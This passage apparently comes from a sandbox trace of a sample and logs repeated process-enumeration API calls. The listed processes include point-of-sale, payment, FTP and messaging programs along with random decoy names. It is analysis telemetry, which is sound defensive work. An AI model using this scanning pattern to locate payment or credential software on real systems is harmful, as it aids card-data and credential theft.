th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0174.099] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0174.101] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0174.104] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0174.109] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0174.112] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0174.115] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0174.117] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0174.122] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0174.124] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0174.130] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0174.133] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0174.136] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0174.139] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0174.142] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0174.144] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0174.147] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0174.150] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0174.153] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0174.157] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0174.159] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0174.162] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0174.165] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0174.179] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0174.181] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0174.184] CloseHandle (hObject=0x19c0) returned 1 [0174.184] Sleep (dwMilliseconds=0x64) [0174.312] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19bc [0174.325] Process32First (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.327] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0174.329] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0174.331] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.333] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0174.335] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.336] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0174.338] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0174.340] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0174.342] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.344] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.345] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0174.390] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.394] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.395] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.397] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.399] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.401] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.402] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.404] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0174.406] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0174.408] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.410] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0174.412] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.414] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0174.416] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0174.418] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0174.421] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0174.423] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0174.429] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0174.504] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.507] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0174.509] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0174.511] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0174.514] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0174.516] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.519] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0174.521] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0174.523] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0174.525] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0174.527] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0174.529] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0174.531] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0174.533] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0174.535] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0174.538] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0174.577] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0174.579] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0174.582] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0174.585] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0174.587] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0174.590] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0174.592] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0174.595] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0174.598] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0174.602] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0174.604] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0174.607] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0174.610] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0174.617] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, 